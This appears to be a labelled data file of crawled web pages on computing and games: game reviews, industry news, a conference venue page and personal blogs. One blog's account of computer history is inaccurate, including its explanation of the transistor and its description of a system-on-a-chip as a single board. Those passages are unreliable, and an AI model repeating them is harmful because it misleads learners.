the Japanese government that turn Japan into a technological "has-been,"
he is not a xenophobe, an ultranationalist, or a person with an axe to grind.
Rather, he prefers cooperation with foreign countries and their corporations,
which is why he made sure the TRON Project and its research results are
open to anyone from anywhere in the world. In fact, he actually likes foreign
people and their cultures. His automobile of choice is a Fiat, and he likes
Scandinavian "wood culture," which he incorporated into his country
home. Moreover, he accepts many foreign students to study under him at the
University of Tokyo.
Professor Sakamura is a member of the Japan Information Processing Society
(JIPS); the Institute of Electronics,Information and Communications Engineers
(IEICE); the Association for Computing Machinery (ACM); and he is a senior
member of the Institute of Electrical and Electronics Engineers (IEEE).
His papers have won awards from JIPS, IEICE, and IEEE.
TRON Project Leader Ken Sakamura sits next to an experimental BTRON machine
in this 1985 photograph. The machine pictured pioneered the electronic pen
as a pointing device for moving the cursor via a digitizing pad between
the user's wrists. This layout was later copied in many notebook computers
due to its ergonomic efficiency, although most of those designs were based
on the use of a track ball instead of an electronic pen and digitizing pad. | 计算机 |
2015-48/3675/en_head.json.gz/5237 | .............................PC . PlayStation 2 / 3 . Xbox / 360 . GameCube / Wii . Handheld Main News
Privacy Policy Recommended
Insert Credit
DigitalBackSpin
Last Updated: Jul 19th, 2009 Odin Sphere Email this article Printer friendly page Developer: Vanillaware Publisher: AtlusGenre: Action / Role-Playing Game / Hodgepodge Players: 1 ESRB: Teen By: Matt Williamson Published: Jun 25, 2007 Overall: 7.5 = Good To call Odin Sphere a role-playing game would be to entirely mislabel it. By common understanding, an RPG mostly involves navigating menus and passively controlling the motions and actions of the playable characters. Odin Sphere is much closer to an action game with elements borrowed from many other genres: real-time strategy, beat-em-ups, shooters, and even card games. With an emphasis on action, Odin Sphere plays as if it was thrown into a melting pot of such elements and emerged as a spectacular theatrical experience that is nearly stunning, yet isn't without flaws.
The game begins with a strong presentation and sense of itself. While the opening loads, a small staff roll informs you of its director, a position usually obscured or hidden in the end credits. The first scene opens up with a young girl standing in a room with a black cat wandering around and a large hardbound book is sitting on the floor. The game's visual style becomes immediately apparent as a blend between Sir John Tenniel (the illustrator of the original Alice in Wonderland) and modern anime. The tone is also set when the player realizes that they have to pick up the book and begin reading to start the game. All five playable characters come with their own books and story lines, and you have to start "reading" the book every time you load your game. This gives the atmosphere of the story a whimsical and fairy tale feeling from the very beginning.
Directed by George Kamitani (known for his directorial debut on the Sega Saturn with Princess Crown), the game takes you through a lengthy theatrical performance on par with its inspiration Der Ring des Nibelungen (commonly known as The Ring) by 19th century composer Richard Wagner. The opera for The Ring is generally a four night performance that takes about 15 hours to watch, a feat which even rivals a back-to-back viewing of Peter Jackson's Lord of the Rings trilogy in its extended form. As a result it's very rarely reproduced, a fate that hopefully won't befall long-form, beautifully drawn, two-dimensional games such as Odin Sphere. While The Ring influenced Odin Sphere, the connections are loose, and what the director himself even calls a "Kamitani-style take on Norse mythology" as opposed to a direct re-telling.
Immediately after the abstract storybook waiting room Odin Sphere throws the player right into the story of a major conflict between nations for a cauldron that forges the most powerful gems. The importance of the gems is only initially suggested, and it takes many hours for the true significance of everything that's shown in the very early game to emerge. This isn't necessarily a benefit though. The game takes a good fifty hours (or more) to finish, and by the end you probably won't remember all the details that the game takes a meticulous joy in making seem important.
The game is ultimately a balancing act of wanting to see what happens next--and in turn putting together the overall puzzle of the narrative--and combat that can end up going on much longer than it should. The story itself isn't bad, reminiscent of the fables by Hans Christian Anderson and The Brothers Grimm. But it never goes any further than that. The conflicts are very straightforward and the enemies are mostly cut and dry. There's a bit of bleed over from the general teen angst common in many RPGs, but that's far from noteworthy inside of a medium that is awash with such stories. While hardly anything worth mentioning in the realm of literature or even theatre, the story weaves in and out of itself in a way that is more compelling and entertaining than a large portion of the current offerings.
The gameplay, like its namesake, flows in a circular formation. Each of the five characters starts out similarly: seemingly simplistic combat with easy tactics and hardly any need for strategy. Similarly, every character escalates into a fevered pitch of complex combat needs, preemptive planning, and a unique strategy in order to finish the later levels. Unfortunately, in between all this, the game waxes and wanes between tedium and excitement.
It is the real interaction with the game that drags things out more than the cut scenes. Between the High School level acting performances on the stage of the game, the player will fight through mostly similar levels with very small variations of the enemies. Some levels are more interesting and compelling, with challenging enemies that force you to constantly change your strategy, while others tend to be blander and straightforward. Though out of it all the levels remain gorgeous and infused with life: constantly flowing, moving, breathing, and overall, alluring. The levels are fast paced with wave after wave of enemies that are easily broken up into ground or air combat. The enemies don't vary much for each level internally, but all are unique to there specific location and all themed appropriately.
To add to the combat the developers designed an ingenious way of getting health and experience: plants. The planting system works easily enough with the player placing a seed in the ground and having it grow by absorbing phozons (the energy of fallen foes). Different seeds harvest different plants which in-turn offer different amounts of experience and health; alternatively, food grown from these seeds can be collected and used to make gourmet cuisine at one of the two restaurants nestled between locations. Potions can also be crafted by add various fruits and vegetables into empty beakers to create an elixir ranging from helpful to useless. To not waste phozons, the player can store them in their weapon, which simultaneously increases the attack power and stores up energy for a strong attack.
The best part of all these elements is that, for the most part, they're done in real-time and integrated perfectly into the game's flow. When entering a new stage the player can plant a grape seed, kill a dozen enemies to feed the plant, cut the grapes from the vine, eat the grapes (refilling health), use the stem from the grapes in a potion, create a napalm potion, and then throw the napalm potion at an enemy to kill them. This all happens in real-time with mild pausing for item selection. And if it's done incorrectly, a potion or fruit can be knocked from your hands before it can be used properly, resulting in tension and need for planning. It's mostly seamless, fast, and streamlined making the longest part of the above-described scenario the actual combat needed to kill enough enemies to grow the grape vine.
Since each of the characters have a different emphasis, different techniques are needed in combat. Learning these new tactics is the source of much of the enjoyment in the beginning, but once these are learned they can become slightly tedious in practice. Three of the five characters play quite similarly, with close combat being their main form of attack. There are two very unique characters though, one which fires a crossbow and flies through the air (the Fairy Queen) and another who uses chains to attack at both close and long range. The placement of these characters is spaced well in-between the similarly playing sword wielding characters. Outside of the Fairy Queen, all the characters attacks follow a similar flow: simple combos that end in a very strong attack as well as a separate air attack combo. The real fun comes in figuring out which technique works best in each situation..
Overall: 7.5/10
As it stands, the game is very good, but there are a few problems. The action is tough and fast enough that it will give even the most hardened gamer a run for their money, yet versatile enough so that gamers who aren't as inclined for a challenge can use their smarts instead by leveling up and creating powerful. I personally love a good challenge, and playing the game on the hard difficulty got all the right responses from my slightly masochistic pleasure centers kicking. The story is engaging and well put together (if not a bit overwrought) with a climatic ending that is rivaled only by the beauty of its presentation.
Many of the problems that I have with the game would be easily solved if the game was paced a bit differently and shortened. Because Odin Sphere treads the same levels over and over again - there's very little variation within each location - it hits a point near the middle of each character's story where the game wears a little thin. With a bit of editing on the story and organization (for example, there are hardly any unique locations because every character goes through nearly all the same places) Odin Sphere would be about the closest thing to a perfect action game that I've played in a long time. © 2005 Entertainment Depot [ Top ] | 计算机 |
2015-48/3675/en_head.json.gz/7295 | Posted Ouya: ‘Over a thousand’ developers want to make Ouya games By
Aaron Colter
Check out our review of the Ouya Android-based gaming console.
Even after the relatively cheap, Android-based Ouya console proved a massive success on Kickstarter (the console was able to pull in nearly $8.6 million from investors despite having an initial goal of only $960,000), pundits and prospective owners of the new gaming machine loudly wondered how well it would be able to attract developers who would otherwise be making games for the Xbox 360, iPhone or PC. Assuming you believe official statements made by the people behind the Ouya console, there is nothing to worry about on that front.
“Over a thousand” developers have contacted the Ouya creators since the end of their Kickstarter campaign, according to a statement published as part of a recent announcement on who will be filling out the company’s leadership roles now that it is properly established. Likewise, the statement claims that “more than 50” companies “from all around the world” have approached the people behind Ouya to distribute the console once it is ready for its consumer debut at some as-yet-undetermined point in 2013.
While this is undoubtedly good news for anyone who’s been crossing their fingers, hoping that the Ouya can make inroads into the normally insular world of console gaming, it should be noted that while these thousand-plus developers may have attempted to reach the Ouya’s creators, the company offers no solid figures on how many of them are officially committed to bringing games to the platform. That “over a thousand” figure means little if every last developer examined the terms of developing for the Ouya and quickly declined the opportunity in favor of more lucrative options. We have no official information on how these developer conversations actually went, so until we hear a more official assessment of how many gaming firms are solidly pledging support to the Ouya platform, we’ll continue to harbor a bit of cynicism over how successful this machine might possibly be.
As for the aforementioned personnel acquisitions, though they’re less impressive than the possibility that thousands of firms are already tentatively working on games for the Ouya, they should offer a bit more hope that the company making the console will remain stable, guided by people intimately familiar with the gaming biz. According to the announcement, Ouya has attracted former IGN president (and the first investor in the Ouya project) Roy Bahat to serve as chairman of the Ouya board. Additionally, the company has enlisted former EA development director and senior development director for Trion Worlds’ MMO Rift, Steve Chamberlin, to serve as the company’s head of engineering. Finally, Raffi Bagdasarian, former vice president of product development and operations at Sony Pictures Television has been tapped to lead Ouya’s platform service and software product development division. Though you may be unfamiliar with these three men, trust that they’ve all proven their chops as leaders in their respective gaming-centric fields.
Expect to hear more solid information on the Ouya and its games line up as we inch closer to its nebulous 2013 release. Hopefully for the system’s numerous potential buyers, that quip about the massive developer interest the console has attracted proves more tangible than not. | 计算机 |
2015-48/3675/en_head.json.gz/8968 | The Crucibleliterally We care about old computersThe Crucible
March 31, 2015 By Flame An Accidental Acquisition
Last year I acquired a new Smartphone. The new acquisition was not out of choice but rather out of necessity. I (still not sure what happened) had destroyed my other smart phone when it fell in water after I left it on a window ledge in the house. I still wonder how a phone decided to take a leap into a pail filled with water. However, the ‘usual suspects’, my two kids fervently claimed innocence and I had to accept full responsibility. Looking at their innocent 5 and 9 year old faces I came up with an explanation that someone must have called and the phone vibrated itself off the ledge onto the pail. Anyway, the phone spent about two hours in the pail and I deemed there was no use trying to fix it. I gave it to my young kids as a play thing.
The kid inquisitor
My nine year old kid is obsessed with opening any electrical device that comes to him, a fault that has earned him my wrath several times. The new gift, the spoiled smart phone, was quickly torn apart and I mean literally torn apart because he used every crude mechanical trick to pry it open. After opening the phone, the questions started coming. The kid wanted to know how a device with such few and small components could manage to work like the bulky PC in his room. Since I do not use a desktop, I have declared and even demonstrated several times to my kids that a Smartphone is just a smaller version of a PC with similar or even superior functionality. As a result of my bragging, I had no choice but to come up with a simple way of explaining the evolution in computer hardware that had reduced the size but increased the functionality of computer hardware.
The historic explanation
I started by introducing the young boy to the concept of system on a chip (SOC). When I saw the bewilderment in his eyes, I realized that I had to go back several years back in the evolution of computer hardware. I decided to classify the various integral computer ages or changes in terms of generations. For the first generation computers, I explained that the first computer, which was created in the 1940s was really big, I told him it was the size of his room. This computer used vacuum tubes which acted as amplifiers (make weak signals stronger), switches (start and stop electricity flow), and also as computer memory. For the second generation computers, I explained how the transistor replaced the vacuum tubes in the late 1950s. The transistor was the first device designed to act as both a transmitter, converting sound waves into electronic waves, and resistor, controlling electronic current. Incidentally, by replacing bulky and unreliable vacuum tubes with transistors, computers could now perform the same functions, using less power and space. Then I proceeded to narrate how the integrated circuit (IC) was introduced in the 1960s. The IC placed the previously separated transistors, resistors, capacitors and all the connecting wiring onto a single crystal (or ‘chip’) made of semiconductor material. These third generation computers increased the functionality and reduced the size of computers considerably. Fourth generation computers were introduced in the 1970s with the introduction of microprocessors. Since then, the computer has evolved based on the microprocessors aimed at reducing size and increasing functionality. Hence, our current Smartphone’s and tablets use the SOC technology and instead of a motherboard, the SOC integrates everything: processor, graphics processor, RAM, interfaces like USB, interfaces for audio, and more onto a single board. Although I am not sure he got everything, the boy has since stopped pestering me with this question.
Copyright © 2015 · Log in | 计算机 |
2015-48/3675/en_head.json.gz/12207 | End to End Report Creation and Management in SQL Server Reporting Services 2008
With Reporting Services 2008, Microsoft takes a step forward in presenting SQL Server as an enterprise data platform. Innovations in data regions, vast improvements in visualisation, and a new Report Designer, Microsoft SQL Server 2008 Reporting Services provides a tool that can be used by all members in the organization.
This session will begin on Installation issues.You will walk through the authoring, management and delivery of reports, focusing on the new features of Reporting Services 2008, creating a report in the new report designer. Raising awareness of Report management options and the delivery mechanisms to deliver reports. Presented by
Chris Testa-O'Neill
SQLBits IV
WMV Video
Chris Testa-O'Neill is the founder and Principal Consultant at Claribi. An experienced professional with over 14 years’ experience of architecting, designing and implementing Microsoft SQL Server data and business intelligence projects at an enterprise scale. He has significant experience of leading and mentoring both business and technical project stakeholders in maximising investment in SQL Server and more recently in Azure solutions.
A regular and respected speaker on the international SQL Server conference circuit, and an organiser of national SQL Server conferences and events, Chris has been recognised as a Microsoft Most Valuable Professional (MVP) by Microsoft. and has been a Microsoft Certified Trainer (MCT) for the last 14 years having both authored and delivered Microsoft Official Courses. | 计算机 |
2015-48/3675/en_head.json.gz/12872 | Last year, Hewlett Packard Company announced it will be separating into two industry-leading public companies as of November 1st, 2015. HP Inc. will be the leading personal systems and printing company. Hewlett Packard Enterprise will define the next generation of infrastructure, software and services.
Public Sector eCommerce is undergoing changes in preparation and support of this separation. You will still be able to purchase all the same products, but your catalogs will be split into two: Personal systems, Printers and Services and Servers, Storage, Networking and Services. Please select the catalog below that you would like to order from.
Note: Each product catalog has separate shopping cart and checkout processes.
Personal Computers and Printers
Select here to shop for desktops, workstations, laptops and netbooks, monitors, printers and print supplies Server, Storage, Networking and Services
Select here to shop for Servers, Storage, Networking, Converged Systems, Services and more.
Privacy Statement | Limited Warranty Statement | Terms of Use ©2015 Hewlett Packard Development Company, L.P | 计算机 |
2015-48/3676/en_head.json.gz/3685 | Original URL: http://www.psxextreme.com/scripts/ps3-reviews/review.asp?revID=432
Need for Speed: Hot Pursuit
Graphics: 8.3
Gameplay: 8.5
Sound: 8.8
Control: 8.7
Replay Value: 8.6
Need for Speed is one of those iconic franchises that should never die. Despite a few lackluster installments over the years, there’s always a chance for a fast-paced racing franchise to redeem itself, and NFS has always managed to bounce back. This time around, Burnout pros Criterion had a chance to once again solidify EA’s long-running series as the premier arcade-style racing experience available. However, while the final result is always entertaining and benefits from that glossy veneer commonly associated with Burnout, I think we fall a tad shy of elite superstardom. There are a few annoying issues with which to contend, and if your PS3 isn’t online, the game becomes surprisingly bare. That being said, the sense of speed, solid technicals, entertaining multiplayer, various events, multiple hot cars, and awesome tools (road block, turbo, helicopter, etc.) make Hot Pursuit well worth playing.
As was the case with the demo, one notices that the lush environments come alive in the daytime, but become a little underwhelming at night. Seacrest County holds some breathtaking vistas and beautiful stretches of road, loaded with plenty of shortcuts, hairpin turns, and of course, the finest cars imaginable. Vehicle detailing is excellent, as are the effects; everything from the reflection of your taillights in the rain to the immensely satisfying crash effects adds a heaping helping of flavor. Some of the backdrops fail to impress when up close and personal and perhaps one could argue for a lack of sharpness, but this remains a consistent, professional visual presentation. The frame rate only hitched on me once but I could never get it to happen again, and although you’re limited to the coastal environment (no snow or lava, or anything), we’re generally happy with what we see.
The sound is just as good, if not a touch better, thanks to a diverse soundtrack that allows the “need for speed” to hit another level of immersion. There is some voice work – a woman that makes the initial introductions and informs you of new unlocks, plus radio communication – and that’s quite pleasant, and the effects that go along with the spectacular crashes are classic Criterion. Just awesome. I’m not the biggest fan of the different engine sounds, as I think they’re not quite pronounced enough, and the music would often take a back seat to the effects, but these are minor drawbacks. There’s just something about hurtling down a picturesque stretch of road at obscene speeds, the hard-hitting music urging you onward, the gritty scraping of metal on metal causing your teeth to clench, and the jarring impact of a crash leaving you breathless. This proves that Criterion did their homework; they instituted exactly what they do best, and combined it with what makes NFS great.
Video Games | Need for Speed: Hot Pursuit | Accolades Launch Trailer
XBox 360 | Playstation 3 | Nintendo Wii
Just so you don’t think I’m complaining bitterly about an admittedly solid and super fun title, I’m going to start with all the positives. First on the list is the Autolog structure, which incorporates the performances of your friends with the standard Career experience. The mechanic will automatically provide recommendations from friends, give you certain goals – i.e., try to beat so-and-so’s best time – and allow you to leave messages on the Wall for bested buddies. This is in addition to the online racing but in reality, the Career mode with Autolog activated feels like a spin-off of the multiplayer component. The reason is because if you’ve got a lot of friends playing the game, you’ll soon find that a gold medal doesn’t mean quite as much as beating the times of your racing compatriots. You’ll soon find yourself replaying certain events for the express purpose of topping your friends. It’s fantastic, but I’ll come back to this in a minute.
Second on the goodie list is the accessible, reliable control that features a touch more realism than we ever had in any Burnout title. It’s still a far cry from Gran Turismo (and even from Need for Speed: SHIFT), but at least the vehicles have weight in Hot Pursuit, and they do perform somewhat as expected; i.e., as their real-life counterparts might perform. Obviously, not all cars power-slide in the exact same way, and not all can make silly turns at silly speeds but that’s the arcade aspect, and it’s absolutely essential for this franchise. That’s just my opinion, of course, but I still say NFS should never become a simulator; it should always be just like this. A little dash of authenticity is appreciated and doesn’t hinder us. Just keep that fun core that doesn’t require a gearhead mentality. Overall, the controls are responsive, the frame rate is 99% rock solid, and the smoothness and fluidity is niiiiice.
Thirdly, there are a combination of smaller positive elements that I particularly enjoyed: the sense of speed is really insane, especially if you have the misfortune of taking an overpowered car on a particularly narrow and bendy track. It keeps you pinned to the edge of your seat, where you should be for a game like this. Then there’s the freedom of bouncing back and forth between various events; you do have to unlock different events as you progress but within the first hour, you’ll have multiple options on your map. Lastly, there are the enhancements that make single-player and multiplayer action totally worthwhile; the spike strip and EMP are only two examples and they sorta give the game a Wipeout feeling. The multiplayer is a blast and almost never skips a beat. Oh, and I should probably mention the cars, because there are lots, and they’re all so unbelievably sweet; these are the most envious rides in the world.
Video Games | Need for Speed: Hot Pursuit | Hot Pursuit Uncovered Trailer
It all gels into a wildly entertaining experience that can really hook you. But if I may…I must vent a bit. 1. If you’re going to include traffic, don’t put three cars out there. Put traffic, so we’re always expecting it and one random vehicle in the middle of nowhere won’t entirely derail one hell of a run. 2. So…even two spike strips aren’t enough to bust a racer? …really? Then what’s the point? I can damage him faster with my car. Good for finishing off, I suppose. 3. Opponents obviously have better visibility than I do. One of these days, I would just love to see one slam headlong into a car when cresting one of those blind hills. 4. Damage dealt can’t be quite that erratic. A racer has half his health left; I’m along beside him and force him into a head-on collision…and yet, there doesn’t seem to be any crash in my rearview mirror. Everything just stops and then he keeps going. Then, the very next round, he loses three-quarters of his health by smacking a guardrail. …okay.
And lastly, here’s the biggest issue I’m sure other critics won’t even bother to mention because they assume the entire world is connected online. But that isn’t the case. It really isn’t. And if you aren’t online with the Autolog in the Career mode, the game loses a lot of its luster; it becomes a very straightforward, go do this event, unlock a car, go do this event, unlock a new piece of equipment, rinse and repeat about a hundred times. You can’t fiddle with your cars at all, there’s no story and in short, there’s no incentive to hit up another event if you already passed it and unlocked the next event. On the surface, it may not seem like much to have your Friends’ times posted, and to have recommendations and all that, but after playing for a while, I realized it was almost crucial to the experience. Without it, the game just isn’t as engrossing. To call it a borderline MMO-Racing title is inaccurate but this emphasis on social participating is obvious, and the solitary, unplugged player does suffer.
Also, let’s not forget that EA Online Pass program; if you buy the game new, you’re fine but if you buy it used, you need to fork over the $10 before you can connect to their servers. And for a game like this, that’s sort of a big deal. This all being said, what lies at the center of Need for Speed: Hot Pursuit is worthy of praise and as a direct result, is worthy of your time and money. The good absolutely outweighs the bad and I freely admit that my complaints in this review can be deemed as very subjective; other racers may not have been quite as frustrated quite as often. Therefore, considering the extraordinarily well-done production on the whole, from the diverse events (chase or race is always an appealing contrast) to the crazy sense of speed to the Autolog to the accomplished technicals to the super cool equipment…it’s just dripping with classic NFS attitude. And that’s hardly a bad thing.
The Good: Mostly pleasing graphics and great sound. Reliable, accessible control. Diverse events. Wicked cool cars and equipment. Race or chase is a perfect contrast. Great sense of speed. High longevity. Autolog is an addictive feature.
The Bad: Some backgrounds are unimpressive. AI blessed with ESP. Erratic damage dealing. If unconnected to the Internet, experience loses some appeal.
The Ugly: “One car…just one car in the middle of effing nowhere…I had it…I had it…”
11/20/2010 Ben Dutka | 计算机 |
2015-48/3676/en_head.json.gz/3737 | What's New? 2004-11
Friday 19 November 2004 Oh, this has been a heck of a week: we come to realize that the roof needs replacing, the car's alternator isn't working (well, I guess it could be the battery), and my PowerBook isn't able to see the internal hard drive for the second time in as many months. I rant.
Thursday 18 November 2004 Dziadziu joins us at Peabody Elementary for a fund-raiser spaghetti dinner (for Mrs. Wong's fourth-grade class trip to Sacramento). The bizarre tale revolves around our family members each winning something from the raffle. Rose won a basket of house-cleaning supplies, then Isaac won a blanket, then Lila a stuffed kangaroo, and then I won a bar of "French milled soap" made in China. A few people won things in-between our winnings, but it was embarassing and not just a bit eerie.
Tuesday 16 November 2004 Á propos nothing at all, this is the second time in as many days that I've heard or read about Lieutenant General John F. Sattler, the Commanding General, First Marine Expeditionary Force, Camp Fallujah, Iraq.
First off, any time one hears one's name spoken (on the radio, in this case) attention is given. Second, the father of one of Isaac's schoolmates is a private telecommunications contractor currently in Fallujah, and the wife is pregnant, and so we jump a little every time we hear the town of Fallujah mentioned.
When I was in the service there were very, very few Sattlers to be found.
Monday 15 November 2004 This photo of Anna Nicole Smith being "assisted backstage" at the American Music Awards (AP/Reed Saxon; used without permission) just tickles me. I'm not the only one who finds this funny: fark.com ran a commentary thread entitled "Anna Nicole Smith: drunk or just mildly retarded?"
Sunday 14 November 2004 The Emporer has no clothes. That's what I was thinking after a meal at Café Jacqueline (in North Beach). Chef-owner Jacqueline Margulis is the only bright spot in this otherwise pretentious eatery, and she was so nice that I'm really sad I didn't like the food, service, or wait staff. People who know me know I love food of all cuisines. So this isn't a "I went to a soufflé place and all they had was soufflés" kind of review.
Between the six of us we tried five soufflés, three main courses (salmon and asparagus, leek and chestnut, and chantrelle mushroom and garlic) and two desserts (bittersweet chocolate and Grand Manier).
The server said it best: "you can't really taste the mushrooms, you feel the mushrooms." That was it, in a nutshell (so to speak). There are so many places in the city to eat from which one walks away saying "wow! what an experience!" that this seemed so underwhelming.
Suggestions: B44 (Catalan), Osteria (Italian), Blowfish (sushi), Mom Is Cooking (Mexican), Picaro (Iberian), Red Grill (American).
Tuesday 9 November 2004 I've been watching Michael Palin's Himalaya series. There's nobody I like to hear talking about travel than him, and I have audio versions of several others in his adventures, but he seems a bit, well, off his game this time around. It seems a bit pro forma, but none of the insight or witty curiosity I've enjoyed in Around the World in 80 Days or Full Circle.
Travel documentaries make me feel wistful, even sad. I'll never have the resources to see as much of the world as I want to. I want to watch along, I want to turn away. But I always turn back.
Much of my unease stems from living on the wrong coast, as it were. Europe, from Scandinavia to Italy, has been my favorite stomping grounds. I can be understood all over, using some of the languages I know. We're near to Asia, here in San Francisco, but so far I haven't had the time and energy to roam through those countries. Omi Marga and I have always wanted to take a trip to Japan, but not so far.
The Mozilla Firefox 1.0 web browser is released today. Is this going to be significant? I'm not sure. Certainly the efforts over the last half-dozen or more years in going from Netscape to Mozilla Firefox has not been either easy or quick, but their hearts are in the right place, and I hear the code is pretty good.
They *do* have a really great graphic, shown at right.
Every web browser is a compromize in look-and-feel. The art is in picking one with which you're comfortable, which extends your reach in ways which match your style. I've given up on Apple Safari in favor of OmniGroup OmniWeb; that's not to say I'm satisfied with my choices.
I'm hoping that the combination of open source code, a community writing plug-ins and extensions, and its platform-agnosticism - available for "Mac OS X", Linux, and Windows - carry some weight in a world which has spent too much time writing websites to deal with the poor citizen which is Microsoft Internet Explorer. To that end, Firefox will succeed if it reaches critical mass, and becomes the standard to which others make sites. Let's hope.
Saturday 6 November 2004 First thing this morning, after breakfast, Rose to Isaac and Lila to the West Portal School library for a Music Maker program. I hear the kids loved it. I don't know because I was at home, waiting for friends to drop off a king-sized mattress at the house. (Postponed until tomorrow evening.)
A substitute teacher of Isaac's is also a producer at Spinning Wheel Productions. They're filming a series of multicultural storytelling videos for children. This morning I drove Isaac to the studios of San Francisco Community Television, cable channel 29, for Story Circle: Stories from Asia.
Kids should not wear white, blue-screen blue, shiny materials, or too "busy" a pattern (which results in Moiré patterns on-screen). Check. Good breakfast. Check. Went to the bathroom before the story. Check.
Then we headed over to the Randall Museum to see the model trains. It was a boffo hour of fun.
Given that Isaac is dealing with a cold, he did a great job. We have some family things planned for tomorrow. I hope they go as well as today's goings-on.
Tuesday 2 November 2004 Much of the conversation these days revolves around how bad things will be four years from now.
The Canadian government has announced that Americans wanting to emigrate are welcome, but will have to follow the standard procedures, which take around a year. And having a job is either required or is a big bonus. And in that vein I came across this picture today. It sums up much of what many of us are feeling. We many not be ready to seceede, but we're already focussing on things below our feet whilst trying to not think about being under the evil soul-sucking, corporate-beholden, dim-bulb government that our fellow citizens have chosen.
Wedneday 3 November 2004 Being a liberal in America is like a bad dream that goes on and on and on. It certainly feels as though we choose the greater of two evils. Sigh.
In an election where the best thing that could be said about John Kerry is that he might carry the "Anyone But Bush" vote, I think it's safe to say that he wasn't the right candidate. I certainly felt Howard Dean was more interesting, and Joseph Leiberman more stimulating. Meh.
In hindsight, I wish it was Howard Dean instead of John Kerry. I think we all issed a great deal when we passed exciting, emotion, motivated in favor of staid, stoic, and even-keeled.
Said the father of Boing Boing creator Cory Doctrow about these election results:
"...The way you feel now is exactly how I felt when Nixon won a second term -- crushed. I just couldn't believe America was that stupid...."
Later in the day I see this map from a Jeff Culver in Seattle, who says: "I was thinking today about how the 'red v. blue' states graphic is really misleading considering the slim margins that the candidates won some of those states by, so I sat down and created the map..."
Tuesday 2 November 2004 We voted in the mid-afternoon. One of the poll-workers remembered the kids from our visit last year. We took the three sheets and a pen and sat down and filled them out as a family. Both Isaac and Lila got many chances to mark our choices. The news started out sounding good:
Monday 1 November 2004 Tomorrow we have an election. An election I suspect we'll be remembering almost as long as the "won 500,000 more popular votes but had the election stolen by the Supreme Court" events of 2000. Why? Well, there's the war in Iraq, three Supreme Court justices likely to be replaced in the next four years, a woman's right to choose abortion, stem cell research, and the all-pervasive decline in civil rights and tolerance seen in the last four years.
Whether you think of this guy as a cocaine-using drunken frat boy incompetent or a strong leader in tough times, the next four years are going to be very frustrating for about half of our population.
Have you found errors nontrivial or marginal, factual, analytical and illogical, arithmetical, temporal, or even typographical? Please let me know; drop me email. Thanks!
What's New? • Search this Site • Website MapTravel • Burning Man • San FranciscoKilts! Kilts! Kilts! • Macintosh • Technology • CU-SeeMe
This page is copyrighted 1993-2009 by Lila, Isaac, Rose, and Mickey Sattler. All rights reserved. | 计算机 |
2015-48/3676/en_head.json.gz/5203 | Posted Square-Enix says no free-to-play for Final Fantasy XIV: A Realm Reborn By
Standing on the bones of many, many failed massively multiplayer role-playing games, the age of the subscription-based game seems to be well and truly over. In 2012, four major MMOs opened for business in the US and of them, only Guild Wars 2 is holding onto its original business model. Star Wars: The Old Republic, TERA Online: The Exiled Realm of Arborea, and The Secret World, meanwhile, all had to transition from subscriptions to free-to-play. The writing for subscriptions is on the wall, but some publishers are pushing forward. Square-Enix is keeping subscriptions for its MMOs, including the upcoming Final Fantasy XIV: A Realm Reborn. “With the free-to-play model, you’ll get huge income one month, but the next month it depletes,” Naoki Yoshida, A Realm Reborn’s director, told The Penny Arcade Report on Friday, “Most MMOs have investors in the background, and the company uses the profit and splits the profit with the investors. But, if the game’s not successful, and it doesn’t reach the target, then they have to switch to free-to-play to try and get just a little profit from it. Among the MMOs in the market, only Blizzard and Square-Enix are making money without investors in the background.”
Yoshida goes on to say that he doesn’t think it was subscriptions that hurt The Old Republic and The Secret World but the quality of the games themselves. Final Fantasy XI is an argument in Square-Enix’s favor. In the decade since the game came out, Square-Enix has earned on average around $48 million per year from the game, a tidy profit for a game whose expansions have been less frequent and less costly than those for Blizzard’s World of Warcraft.
Even as Final Fantasy XI continues to serve a devoted audience though, the future of Square’s subscription model is not guaranteed. First, the failure of Final Fantasy XIV’s initial release in 2010 may have shattered any mass appeal for the game. The MMO flopped so spectacularly that it was cited as the main reason for Square’s $150 million loss for fiscal 2011.
Meanwhile, Square’s other recently released MMO is struggling to find players. The subscription-based Dragon Quest X for Nintendo Wii has sold around just 634,000 copies since its August release. The game costs around $13 per month to play. Compared to past Dragon Quest releases, this is a poor showing. Dragon Quest IX for Nintendo DS, another online role-playing game, sold 4.3 million copies in its first six months on shelves. | 计算机 |
2015-48/3676/en_head.json.gz/6558 | How to Install Google Quick Search Box
Google has recently discontinued Quick Search Box for Windows, which was included in Google Toolbar. If you liked the application, there's a way to use it, even if it's no longer available in Google Toolbar.1. If you already have Google Toolbar for IE, it's likely that the toolbar has been updated to the latest version and you need to uninstall it. Just click the arrow next to the Google Toolbar wrench and select "Uninstall".2. Install an older version of Google Toolbar for IE (6.3). 3. Now you can install the latest version of Google Toolbar from toolbar.google.com or wait until the application updates itself. You can also install the most recent version from FileHippo.
Google Toolbar, | 计算机 |
2015-48/3676/en_head.json.gz/6836 | April 11th-13th 2012
Novi Sad, Serbia
19th Annual IEEE International Conference and Workshops on the Engineering of Computer Based Systems
Journal Special Issue
IEEE ECBS 2011
IEEE ECBS 2012 will be held at the Hotel Park.
Address: Novosadskog Sajma 35, 21000 Novi Sad, Serbia.
Web presentation: http://www.hotelparkns.com/
About Novi Sad
Novi Sad is the city in the Vojvodina, northern Serbian province, is placed on the banks of river Danube, next to the national park Fruska Gora. Twenty percent of the entire Vojvodinian population lives in Novi Sad. It is the second largest city in Serbia.
What differentiate Novi Sad from other cities in Serbia is a wide diversity of nationalities, cultures and religions. Five Orthodox churches, Jewish synagogue and Catholic cathedral in the very heart of Novi Sad symbolize the multiculturalism of this city. As the second biggest city in Serbia, Novi Sad is becoming the main cultural center in country and bears the name Serbian Athens.
Some of the main cultural events that take place in Novi Sad every year are "Sterijino pozorje" (theatre festival), traditional "Zmajeve decije igre" (children's festival) and the famous "EXIT" - one of the best music festivals in Europe. Novi Sad was also a host of the European Basketball Championship in 2005. These and many other events largely contribute the image of Novi Sad, Vojvodina and entire country. Novi Sad is a university city, a city of museums, galleries, libraries, theatres... It is a center of well developed journalistic and publishing industries, radio and television. Novi Sad is the seat of Matica Srpska and a city of fairs with many traditional and worldwide recognized international manifestations. It is a railway and road crossing on the main international railroad from Athens, i.e. Istanbul to Budapest.
Serbian language is in the official use in the City and so is the Cyrillic alphabet. Hungarian, Slovak and Ruthenian are also in the official use, along with their alphabets, in accordance with the Law and the Decision of the City Assembly of Novi Sad.
History of Novi Sad
